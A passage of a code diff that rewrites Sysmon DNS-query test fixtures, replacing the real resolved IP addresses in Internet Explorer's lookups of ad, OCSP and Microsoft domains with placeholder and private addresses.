@@ -2386,7 +2386,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "log": { "level": "information" @@ -2415,7 +2415,7 @@ "ProcessId": "2736", "QueryName": "c1.adform.net", "QueryStatus": "0", - "QueryResults": "type: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;", + "QueryResults": "type: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.271", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -2429,7 +2429,7 @@
 "event_data": {
 "QueryName": "urs.microsoft.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;",
+ "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.271",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -2457,7 +2457,7 @@ "event": { "provider": "Microsoft-Windows-Sysmon", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event" }, "log": { @@ -2489,7 +2489,7 @@ "ProcessId": "2736", "QueryName": "dsum-sec.casalemedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;", + "QueryResults": "type: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.290" }, 
@@ -2500,7 +2500,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2509,7 +2509,7 @@ { "@timestamp": "2021-05-05T15:30:51.699Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2525,7 +2525,7 @@ "ProcessId": "2736", "QueryName": "ocsp.godaddy.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;" + "QueryResults": "type: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;" }, "computer_name": "vagrant-2016", "version": 5, 
@@ -2684,7 +2684,7 @@
 "ProcessId": "2736",
 "QueryName": "ocsp.usertrust.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "process": {
@@ -2705,7 +2705,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2719,7 +2719,7 @@
 "version": 5,
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "type: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;",
+ "QueryResults": "type: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.343",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -2747,7 +2747,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2776,7 +2776,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;", + "QueryResults": "type: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.391", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -2789,7 +2789,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
